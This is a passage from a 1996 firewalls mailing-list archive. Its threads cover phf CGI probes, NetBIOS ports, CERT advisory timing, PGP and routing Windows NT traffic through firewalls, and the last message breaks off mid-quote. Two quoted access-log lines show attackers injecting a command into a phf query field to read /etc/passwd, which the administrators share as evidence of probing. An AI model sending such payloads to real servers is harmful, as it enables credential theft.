Alternately, you can run the Outer Firewall running essentially the same filters that the inner one runs and have two different types of firewalls in place simultaneously. The downside is that you have to look at two different sets of logs. BobK From firewalls-owner Mon Jul 15 15:33:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA02181 for firewalls-outgoing; Mon, 15 Jul 1996 15:27:35 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA02067 for ; Mon, 15 Jul 1996 15:27:07 -0700 (PDT) Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3) Message-Id: <9607152223.AA17949@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id To: James Proffer Cc: firewalls From: Ryan.Russell/SYBASE Date: 15 Jul 96 15:24:47 EDT Subject: Re: Dirty dogs X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Indeed. Thanks for the info. Ryan ---------- Previous Message ---------- To: Ryan.Russell cc: harold, firewalls From: james @ mail.state.mo.us (James Proffer) @ smtp Date: 07/15/96 05:10:22 PM Subject: Re: Dirty dogs CERT announced this vulnerability in CA-96.06 (ftp://info.cert.org/pub/cert_advisories/CA-96.06.cgi_example_code) On 15 Jul 1996, Ryan Russell/SYBASE wrote: > I have yet to see a CERT advisory on these... > > Don't they usually warn about attacks that are > being actively pursued? > > Ryan > > ---------- Previous Message ---------- > To: james > cc: firewalls > From: harold @ dornsife.com (Harold Alston) @ smtp > Date: 07/15/96 12:33:09 PM > Subject: Re: Dirty dogs > > two attacks same kind on 7/14/96, both from same host. 
> What action has
> anyone taken on these?
> 
> James Proffer wrote:
> > 
> > > We got a lot of these too:
> > > 
> > > access_log:206.12.81.100 - - [07/Jul/1996:21:48:58 -0400] "GET
> > > /cgi-bin/phf?Qname=tests%0acat%20/etc/passwd HTTP/1.0" 404 -
> > > 
> > > Not original but they tried--looks like an automated script judging from
> > > the similarities of the log entries.
> > > 
> > > In any case does anyone else have any experiences with this? I know the
> > > problem and all, I'm just trying to get an idea of how widespread this is.
> > 
> > Our one and only attempt was on July 4 of this year.
> > 
> > slip51.genstar.net - - [04/Jul/1996:00:37:24 -0500] "GET
> > /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 403 0
> > 
> > Missouri State Data Center <*> James Proffer: UNIX sysadm
> > Missouri Government Information | mailto:james@mail.state.mo.us
> > for the citizens of Missouri | http://www.state.mo.us/server.html
> > and the citizens of the world | (573) 751-1544 Fax: (573) 751-3299
> 
> -- 
> ___________________________
> Harold Alston
> harold@dornsife.com
> Network Systems Administrator
> Dornsife & Associates, Inc.
> Internet Commerce Strategies
> (p) 619-673-1855
> (f) 619-673-1854
> I do not fear computer.
> I fear the lack of them.
> - Isaac Asimov
> 
> 
> 
> 
> 

Missouri State Data Center <*> James Proffer: UNIX sysadm
Missouri Government Information | mailto:james@mail.state.mo.us
for the citizens of Missouri | http://www.state.mo.us/server.html
and the citizens of the world | (573) 751-1544 Fax: (573) 751-3299

From firewalls-owner Mon Jul 15 16:08:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA04513 for firewalls-outgoing; Mon, 15 Jul 1996 15:47:46 -0700 (PDT) Received: from rbit.co.za (rbit.co.za [196.7.71.94]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id PAA04160 for ; Mon, 15 Jul 1996 15:44:54 -0700 (PDT) Received: (from johnb@localhost) by rbit.co.za (8.7.3/8.7.3) id AAA07356; Tue, 16 Jul 1996 00:41:29 +0200 From: John Betts Message-Id: <199607152241.AAA07356@rbit.co.za> Subject: Re: Ports 137 & 138 To: bill.stout@hidata.com (Bill Stout) Date: Tue, 16 Jul 1996 00:41:29 +0200 (SAT) Cc: firewalls@greatcircle.com In-Reply-To: <199607152022.NAA14781@osc.osc.hidata.com> from "Bill Stout" at Jul 15, 96 01:22:25 pm Reply-to: johnb@aztec.co.za Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

% Do some NT websites use port 137 to resolve names? My proxy
% logs indicate that some hits on port 137 are in groups
% of 3, some from websites. My perusal of denied 137 hits:
%

Well, my explanation is as follows:

When I put a linux box down on a doze network running samba (the lanman file sharing program for unix..) the windoze boxes don't pick it up.... until they make some or other tcp connection to it, like using it as the e-mail/proxy host...

My explanations are as follows:

a) maybe those were windows boxes trying to connect to your web site, and then automatically tried to check any netbios traffic at the same time (as a windows "feature") so that ppl could look at your shares under file mangler?

b) thought of the possibility of your web server which could be an NT one..
that was establishing the netbios-ns request (port 137) and those denieds were just from machines trying to reply to them?

Any other ideas/suggestions?

ciao
-- John
-- 
John Betts, Aztec Internet Services Port Elizabeth, South Africa
johnb@aztec.co.za, Tel. +27(0)41 303 475, Fax. +27(0)41 301 052
Authorised Caldera Consultant || Part of the UUNet Group
The world is complex. The Sendmail configuration reflects this.

From firewalls-owner Mon Jul 15 16:58:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA09436 for firewalls-outgoing; Mon, 15 Jul 1996 16:36:23 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id QAA09416 for firewalls@greatcircle.com; Mon, 15 Jul 1996 16:36:17 -0700 (PDT) Received: from phoenix.iss.net (phoenix.iss.net [204.241.60.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA19929 for ; Thu, 11 Jul 1996 07:58:27 -0700 (PDT) Received: from alexf.iss.net (alexf.iss.net [204.241.60.153]) by phoenix.iss.net (8.6.13/8.6.12) with SMTP id KAA24217 for ; Thu, 11 Jul 1996 10:55:26 -0400 Message-Id: <199607111455.KAA24217@phoenix.iss.net> Comments: Authenticated sender is From: "Alex F" Organization: Internet Security Systems, Inc. To: firewalls@GreatCircle.COM Date: Thu, 11 Jul 1996 10:57:05 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: NT Backoffice "Catapult" firewall certified? Reply-to: alexf@iss.net X-mailer: Pegasus Mail for Win32 (v2.32a) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> To subscribe to the NTSecurity list send mail to majordomo@iss.net
> with the following in the body
> 
> subscribe ntsecurity my@email.address
> 
> (Where my@email.address is your email address).
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Please pay attention to the above line and do not attempt to subscribe the address my@email.address. Yes, several people did this by mistake :) (oops)

> 
> Soon you'll be able to sign up over the web for the list (just gotta
> get around to it).

This is done (I actually had the time), and you can sign up for any of 3 lists that we run.

Sorry for the noise.

Alex F
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F                alexf@iss.net
Marketing Specialist  Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-

From firewalls-owner Tue Jul 16 05:06:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA09167 for firewalls-outgoing; Tue, 16 Jul 1996 04:54:35 -0700 (PDT) Received: from info.megasoft.com (info.megasoft.com [204.5.162.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA09160 for ; Tue, 16 Jul 1996 04:54:27 -0700 (PDT) Received: by info.megasoft.com id HAA04699; Tue, 16 Jul 1996 07:49:37 -0400 (EDT) Received: from megasoft.com by info.megasoft.com via smap (info.megasoft.com) Received: by research.megasoft.com (SMI-8.6/SMI-SVR4) Date: Tue, 16 Jul 1996 07:43:41 -0400 Message-Id: <199607161143.HAA07348@research.megasoft.com> From: C Matthew Curtin To: jgeuin@ix.netcom.com (James L. Geuin) Cc: N Bhalla , jgeuin@netcom.com Subject: Re: Encryption .. May be i am asking at the wrong place In-Reply-To: <199607131450.HAA17334@dfw-ix12.ix.netcom.com> References: <199607131450.HAA17334@dfw-ix12.ix.netcom.com> Reply-To: cmcurtin@megasoft.com X-Attribution: Matt Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>>>>> "James" == James L Geuin writes:

Someone else said...

>> But why are people still using other data encryption packages ..
>> Why can't the unix password etc be also encrypted in PGP Why can't
>> the cellular phones whose numbers are being tracked down by
>> scanners not be encrypted in pgp ..
I get the impression that this person is confusing cryptographic applications and algorithms. PGP, as it exists today, is geared toward the encryption of email. Of course, the same protocols and algorithms could be written into silicon so that PGP-enabled devices would be all over the place, but I suspect the manufacturers of consumer electronics don't want to deal with the US government's certain requests (or even orders) to not do this-or-that with their products.

PGPfone is an application by Zimmermann, et al, which basically turns your computer into a crypto phone, using PGP's protocols and algorithms.

PGP uses freely available algorithms (RSA, IDEA and MD5) in current implementations and will continue to do so in future versions (although rumor is that it will include more choices of what you want to use for various parts: i.e., encrypt data with IDEA or 3DES? MD5 or SHA for signatures?) Other products *do* use these algorithms, but PGP is a trademarked name, and just because Joe Blow Crypto uses RSA and IDEA, he doesn't have an automatic right to call it PGP. And RSA is patented, so there are licensing issues with RSA...

But this is way off of the firewalls topic. I suspect that cypherpunks is the place you want to ask (mail cypherpunks-request@toad.com for info.)

James> I don't want to encrypt everything, just one or two
James> applications. Have you heard of anything that I could use?

It isn't clear *what* you want to encrypt. Apparently not your entire data stream, just some parts of it .... Perhaps email? From what are you trying to protect yourself? Someone in your provider's cloud from snooping your PVC and picking up .... passwords? email? anything?

Please direct follow-ups to me personally; this is beyond the scope of the firewalls list.
--
C Matthew Curtin  MEGASOFT, LLC  Director, Security Architecture
cmcurtin@research.megasoft.com  http://www.research.megasoft.com/~cmcurtin/
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet

From firewalls-owner Tue Jul 16 05:24:12 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA10031 for firewalls-outgoing; Tue, 16 Jul 1996 05:14:19 -0700 (PDT)
Received: from info.megasoft.com (info.megasoft.com [204.5.162.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA10024 for ; Tue, 16 Jul 1996 05:14:12 -0700 (PDT)
Received: by info.megasoft.com id IAA04734; Tue, 16 Jul 1996 08:11:07 -0400 (EDT)
Received: from megasoft.com by info.megasoft.com via smap (info.megasoft.com)
Received: by research.megasoft.com (SMI-8.6/SMI-SVR4)
Date: Tue, 16 Jul 1996 08:05:27 -0400
Message-Id: <199607161205.IAA07500@research.megasoft.com>
From: C Matthew Curtin
To: firewalls
Subject: CERT Advisories (was: Re: Dirty dogs)
In-Reply-To: <9607152140.AA16179@notesgw2.sybase.com>
References: <9607152140.AA16179@notesgw2.sybase.com>
Reply-To: cmcurtin@megasoft.com
X-Attribution: Matt
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>>>>> "ryan" == SYBASE writes:

ryan> I have yet to see a CERT advisory on these... Don't they
ryan> usually warn about attacks that are being actively pursued?

Yes, but only on attacks that are known to have a fix. Presumably, getting rid of /cgi-bin/phf would do the trick, hence, CERT would be able to send out an advisory. Has 8LGM sent one out? I haven't seen anything.
Maybe it's time for a "firewalls advisory" :-)

--
C Matthew Curtin  MEGASOFT, LLC  Director, Security Architecture
cmcurtin@research.megasoft.com  http://www.research.megasoft.com/~cmcurtin/
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet

From firewalls-owner Tue Jul 16 06:03:22 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA13680 for firewalls-outgoing; Tue, 16 Jul 1996 06:00:36 -0700 (PDT)
Received: from pathfinder.com (relay.pathfinder.com [204.71.242.18]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA13643 for ; Tue, 16 Jul 1996 06:00:22 -0700 (PDT)
Received: from harpoon.excalibur-group.com by pathfinder.com (8.6.12/SMI-SVR4)
Message-Id: <2.2.32.19960716125704.007383e4@mail.pathfinder.com>
X-Sender: josh@mail.pathfinder.com
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 16 Jul 1996 08:57:04 -0400
To: cmcurtin@megasoft.com, firewalls
From: Josh Hartmann
Subject: Re: CERT Advisories (was: Re: Dirty dogs)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

CERT has sent out a warning about ill-behaved cgi applications distributed with early NCSA and Apache servers. It was this past winter or spring, I believe.

This is not rocket science, folks. If you run a web server, you need to understand the applications which can be executed by remote, untrusted users. These live within the CGI directories. *ALWAYS* inspect the source code of these applications, and if you do not understand it, do not allow it to be executed.

'Nuff said.

-Josh

At 08:05 AM 7/16/96 -0400, C Matthew Curtin wrote:
>>>>>> "ryan" == SYBASE writes:
>
>ryan> I have yet to see a CERT advisory on these... Don't they
>ryan> usually warn about attacks that are being actively pursued?
>
>Yes, but only on attacks that are known to have a fix. Presumably,
>getting rid of /cgi-bin/phf would do the trick, hence, CERT would be
>able to send out an advisory. Has 8LGM sent one out? I haven't seen
>anything.
>
>Maybe it's time for a "firewalls advisory" :-)
>
>--
>C Matthew Curtin  MEGASOFT, LLC  Director, Security Architecture
>cmcurtin@research.megasoft.com  http://www.research.megasoft.com/~cmcurtin/
>Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet
>
>
===================================================================
Josh Hartmann            josh@pathfinder.com
The Excalibur Group      100 First Stamford Place
(203) 406-2908           Stamford, CT 06902
fax (203) 406-2921
A joint venture between Time Inc. New Media and Time Warner Cable
===================================================================

From firewalls-owner Tue Jul 16 06:33:33 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA15141 for firewalls-outgoing; Tue, 16 Jul 1996 06:29:15 -0700 (PDT)
Received: from gw.genre.com (genre.com [204.149.79.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA15132 for ; Tue, 16 Jul 1996 06:29:08 -0700 (PDT)
Received: by gw.genre.com id AA09437
Received: by gw.genre.com (Internal Mail Agent-2);
Message-Id: <9607161325.AA7376@grcstm-nx02.genre.com>
Received: by gw.genre.com (Internal Mail Agent-1);
To: firewalls
From: ygerman
Date: 16 Jul 96 9:22:51
Subject: CERT Advisories (was: Re: Dirty dogs)
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

ryan> I have yet to see a CERT advisory on these... Don't they
ryan> usually warn about attacks that are being actively pursued?

CERT only sends out advisories once the manufacturer or the developer puts out a fix for the problem. So if you see a CERT advisory it means that the 'crackers' have known about the bug for weeks or even months. As always, System Admins / Security are always fighting a catch-up battle with no way of winning.
One way to actually know what is going on is to get on the 'cracker' web sites, bbs's, IRC's and fix the problems before they are released in CERT.

From firewalls-owner Tue Jul 16 07:11:18 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA17439 for firewalls-outgoing; Tue, 16 Jul 1996 06:59:34 -0700 (PDT)
Received: from relay2.jaring.my (relay2.jaring.my [192.228.128.12]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA17422 for ; Tue, 16 Jul 1996 06:59:24 -0700 (PDT)
Received: from j14.glg53.jaring.my (j14.glg53.jaring.my [161.142.227.220]) by relay2.jaring.my (8.6.13/8.6.12) with SMTP id VAA19736; Tue, 16 Jul 1996 21:55:54 +0800
Message-Id: <199607161355.VAA19736@relay2.jaring.my>
X-Sender: tjlow@pop2.jaring.my
X-Mailer: Windows Eudora Version 1.4.3
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 16 Jul 1996 21:53:43 +0100
To: cmcurtin@megasoft.com, firewalls
From: tjlow@pl.jaring.my (Low Taek Jho)
Subject: Need some help.
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Yo,
OK, I'm going on holiday in Aug. And I know that all my mails will fill up my mailbox and go beyond 4 MB which is my limit on my server. I called up the server and they said that they couldn't do anything to increase the space. Any ideas how I could let the mails keep on coming in without my server deleting it? thanks./.

By,
Jho.

From firewalls-owner Tue Jul 16 07:55:50 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA19763 for firewalls-outgoing; Tue, 16 Jul 1996 07:34:10 -0700 (PDT)
Received: from phoenix.iss.net (phoenix.iss.net [204.241.60.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA19756 for ; Tue, 16 Jul 1996 07:34:03 -0700 (PDT)
Received: (from davem@localhost) by phoenix.iss.net (8.6.13/8.6.12) id KAA21171; Tue, 16 Jul 1996 10:30:50 -0400
Date: Tue, 16 Jul 1996 10:30:48 -0400 (EDT)
From: "David J. Meltzer"
To: firewalls@GreatCircle.COM
Subject: Re: CERT Advisories (was: Re: Dirty dogs)
In-Reply-To: <9607161325.AA7376@grcstm-nx02.genre.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> One way to actually know what is going on is to get on the 'cracker' web
> sites, bbs's, IRC's
> and fix the problems before they are released in CERT.
>

This is actually quite a waste of time. There are several mailing lists that are commonly used by security professionals to initially report problems (Bugtraq, Best of Security, Linux Security, Freebsd Security, etc.), and it is vital that any security administrator stays current with anything relevant being posted to these. Unpublished information is not available on some top secret web pages, only accessible by typing in "hacker" in altavista. Unpublished information is not available by attempting to infiltrate some secret hacker BBS. Unpublished information is not available by asking for it on IRC.

CERT is certainly not a single resource to be relied upon as it is often several months behind the mailing lists and only selectively issues advisories on problems. Still, that is not grounds for sending security conscious admins off on a wild goose chase. If you have been so successful in infiltrating the things you speak of and have found information that has not been available through reading relevant mailing lists, I suppose you have numerous unpublished exploits you are protecting your systems with? Perhaps you could share a few with us?

--------------------------------+---------------------
David J. Meltzer                | Email: davem@iss.net
Systems Engineer                | Web:   www.iss.net
Internet Security Systems, Inc. | Fax:   (404)252-2427

From firewalls-owner Tue Jul 16 08:55:50 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA25582 for firewalls-outgoing; Tue, 16 Jul 1996 08:37:55 -0700 (PDT)
Received: from uumx.smtp.psi.net (uumx.smtp.psi.net [38.9.4.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA25566 for ; Tue, 16 Jul 1996 08:37:47 -0700 (PDT)
Received: from uu5.psi.com by uumx.smtp.psi.net (8.6.12/SMI-4.1.3-PSI)
Received: from cdcc.com by uu5.psi.com (5.65b/4.0.071791-PSI/PSINet) via UUCP;
Received: from cdcc.cdcc.com by cdcc.com (4.1/SMI-4.1)
Date: Tue, 16 Jul 96 10:36:30 EDT
From: markj@cdcc.com (Mark Januszka)
Message-Id: <9607161436.AA20402@cdcc.com>
To: cmcurtin@megasoft.com, firewalls@GreatCircle.COM
Subject: Re: Need some help.
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> From uupsi5!GreatCircle.COM!firewalls-owner Tue Jul 16 10:23:56 1996
> X-Sender: tjlow@pop2.jaring.my
> X-Mailer: Windows Eudora Version 1.4.3
> Mime-Version: 1.0
> Content-Type: text/plain; charset="us-ascii"
> Date: Tue, 16 Jul 1996 21:53:43 +0100
> To: cmcurtin@megasoft.com, firewalls
> From: uupsi5!pl.jaring.my!tjlow (Low Taek Jho)
> Subject: Need some help.
> Sender: uupsi5!GreatCircle.COM!firewalls-owner
> Content-Length: 347
>
> Yo,
> OK, I'm going on holiday in Aug. And I know that all my mails will fill
> up my mailbox and go beyond 4 MB which is my limit on my server. I called
> up the server and they said that they couldn't do anything to increase the
> space. Any ideas how I could let the mails keep on coming in without my
> server deleting it? thanks./.
>
> By,
> Jho.
>
>

You can redirect your mail into a script (via aliases) that could screen and / or save it in your home directory.

L8r,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Mark W. Januszka
Senior Systems Administrator - CDC Capital Inc
Phone: 212-891-6296
Email: markj@cdcc.com
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

From firewalls-owner Tue Jul 16 09:22:10 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA26621 for firewalls-outgoing; Tue, 16 Jul 1996 09:06:02 -0700 (PDT)
Received: from earth.usa.net (earth.usa.net [192.156.196.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA26614 for ; Tue, 16 Jul 1996 09:05:53 -0700 (PDT)
Received: (from mec@localhost) by earth.usa.net (8.7.5/8.7.5) id KAA26290; Tue, 16 Jul 1996 10:02:36 -0600 (MDT)
Date: Tue, 16 Jul 1996 10:02:34 -0600 (MDT)
From: "Matthew Cable/USA.NET Inc."
X-Sender: mec@earth
To: "David J. Meltzer"
cc: firewalls@GreatCircle.COM
Subject: Re: CERT Advisories (was: Re: Dirty dogs)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 16 Jul 1996, David J. Meltzer wrote:

> > One way to actually know what is going on is to get on the 'cracker' web
> > sites, bbs's, IRC's
> > and fix the problems before they are released in CERT.
> >
>
> This is actually quite a waste of time. There are several mailing lists that
> are commonly used by security professionals to initially report problems
> (Bugtraq, Best of Security, Linux Security, Freebsd Security, etc.), and it
> is vital that any security administrator stays current with anything relevant
> being posted to these. Unpublished information is not available on some
> top secret web pages, only accessible by typing in "hacker" in altavista.
> Unpublished information is not available by attempting to infiltrate some
> secret hacker BBS. Unpublished information is not available by asking for
> it on IRC.
you are one bad-ass m0f0 ;)

#!/usr/bin/perl -- Matthew Cable -- USA.NET -- Senior System Administrator
$fof='8a*)v2*^Gf#*5S="!jh!;F)]#T):)#&f5kR^(%!E#;0>#:|#8)#;P#80#:o#;)#;

From firewalls-owner Tue Jul 16 09:54:50 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA28375 for firewalls-outgoing; Tue, 16 Jul 1996 09:44:12 -0700 (PDT)
Received: from dfw-ix9.ix.netcom.com (dfw-ix9.ix.netcom.com [206.214.98.9]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA28368 for ; Tue, 16 Jul 1996 09:44:06 -0700 (PDT)
Received: from ftp2 (ftp2.retailpro.com [204.86.245.12]) by dfw-ix9.ix.netcom.com (8.6.13/8.6.12) with SMTP id JAA26347 for ; Tue, 16 Jul 1996 09:41:02 -0700
Message-ID: <31EBC545.4E3C@ix.netcom.com>
Date: Tue, 16 Jul 1996 09:37:25 -0700
From: "Karl W. Palachuk"
Reply-To: karlp@ix.netcom.com
Organization: Firebrand
X-Mailer: Mozilla 3.0b5a (WinNT; I)
MIME-Version: 1.0
To: firewalls@greatcircle.com
Subject: Ports 137 & 138
References: <199607152241.AAA07356@rbit.co.za>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> Do some NT websites use port 137 to resolve names? My proxy
> logs indicate that some hits on port 137 are in groups
> of 3, some from websites. My perusal of denied 137 hits:
>

The old (1993) Microsoft Lan Manager and RFC 1060 define ports 137 and 138 as udp (rather than tcp) ports. 137 is defined as nbname (net beui name). 138 is defined as nbdatagram (net beui datagram). Someone might be trying to access these via tcp, but of course that would fail.

--
 / Karl W. Palachuk          Firebrand Corporation            \
/  4800 Manzanita Ave.       http://www.firebrand.com          \
\  Carmichael, CA 95608      mailto:karl@rti.uucp.netcom.com   /
 \ Ph: 916-483-9736          Fax: 916-481-6903                /

From firewalls-owner Tue Jul 16 10:09:07 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA29891 for firewalls-outgoing; Tue, 16 Jul 1996 10:01:41 -0700 (PDT)
Received: from uumx.smtp.psi.net (uumx.smtp.psi.net [38.9.4.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA29884 for ; Tue, 16 Jul 1996 10:01:34 -0700 (PDT)
Received: from uu5.psi.com by uumx.smtp.psi.net (8.6.12/SMI-4.1.3-PSI)
Received: by uu5.psi.com (5.65b/4.0.071791-PSI/PSINet) via UUCP;
Received: from shellgate.shell.com by shellus.com SHELLGATE-X1.4 id AA13600; Tue, 16 Jul 96 11:28:43 -0500
Received: from blake by shellgate.shell.com SHELLGATE-I1.3 id AA08886; Tue, 16 Jul 96 10:11:25 -0500
Received: from localhost by blake.ic.shell.com (4.1/BRC-2.0)
Message-Id: <9607161145.AA08482@blake.ic.shell.com>
To: Firewalls@GreatCircle.COM
Cc: ntsecurity@iss.net
Subject: Windows NT & Firewalls
Date: Tue, 16 Jul 96 06:45:53 -0500
From: "Greg Otto"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am looking for any information possible on how to pass NT File Server traffic through an IP firewall. Primarily, are there any firewalls out there that will pass NT traffic including WINS lookups and data. I have thought about this and with NAT, the only thing I see that can possibly make it work is to put a WINS server out on the DMZ and put in addresses corresponding to how address translation works.

Also, how would one go about doing outbound traffic through a proxy type firewall.

These are just some ideas I am trying to sort out. Any information or direction on where to find some help would be greatly appreciated.

Thanks,
Greg

Gregory D. Otto - gdo@shellus.com
Engineer Voice & Data Networking
Shell Services Company

From firewalls-owner Tue Jul 16 11:48:58 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA07400 for firewalls-outgoing; Tue, 16 Jul 1996 11:32:07 -0700 (PDT)
Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA07364 for ; Tue, 16 Jul 1996 11:31:55 -0700 (PDT)
Received: by mail.rc.toronto.on.ca with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0)
Message-ID:
From: Russ
To: "'Firewalls@GreatCircle.COM'"
Cc: "'ntsecurity@iss.net'"
Subject: RE: Windows NT & Firewalls
Date: Tue, 16 Jul 1996 14:26:36 -0400
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

You could open TCP port 139, and use entries in the client's LMHOSTS file to give direct access to file shares. Your users would have to know what they are trying to connect to, both in terms of the machine name and the share name. You could handle this with permanent ghosted shares in everyone's file manager, or with shortcuts if you're using Win95/NT 4.0. This will rely on NT's event logger to inform you of security issues such as someone continually trying to connect to a share with an invalid user ID or password.

If you are trying to get to an NT Service, like Exchange Server, then the issue is a bit more complicated. You will have to leave TCP port 135 open, for the portmapper, then force the service to use specific ports, and then leave those ports open as well. There aren't any NT specific proxies that I am aware of for any of these services, but many of the generic proxies will check for the more common hack attempts.
Putting an NT Server in your DMZ for WINS services implies that you either want to permit browsing (something I would strongly discourage), or Domain Trust connectivity. If you simply want to provide Domain Trust connectivity, then you could set up LMHOSTS entries for the opposite servers using the IP address of your opposite firewall beside the NetBIOS name. Then have the firewall proxy traffic from ports 135 and 137 from your known Firewalls only to an internal NT server.

What you really want is included in PPTP, and the CIFS initiatives. NT 4.0 implements the integration of DNS with WINS, allowing you to use a DNS name instead of a NetBIOS name to refer to another machine, thereby eliminating the need for the external WINS box. As long as your opposite Firewall can resolve the DNS lookup request, NT would be able to resolve the NetBIOS name properly even with address translation. Connecting NT Domains through a Firewall, however, still relies on the Firewall's ability to proxy the traffic through, either directly to another NT box, or straight onto your network (obviously not recommended).

>
>Cheers,
>Russ
>...running MS Exchange Server 4.0 on NT 4.0, the future is here now.
From firewalls-owner Tue Jul 16 12:48:22 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA08001 for firewalls-outgoing; Tue, 16 Jul 1996 11:43:38 -0700 (PDT)
Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA07994 for ; Tue, 16 Jul 1996 11:43:30 -0700 (PDT)
Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id NAA25709; Tue, 16 Jul 1996 13:36:52 -0500
Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr)
Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA09015
Date: Tue, 16 Jul 1996 13:38:39 -0500 (CDT)
From: Ken Hardy
Reply-To: Ken Hardy
To: Greg Otto
Cc: Firewalls@GreatCircle.COM, ntsecurity@iss.net
Subject: Re: Windows NT & Firewalls
In-Reply-To: <9607161145.AA08482@blake.ic.shell.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 16 Jul 1996, Greg Otto wrote:

> Also, how would one go about doing outbound traffic through a proxy
> type firewall.

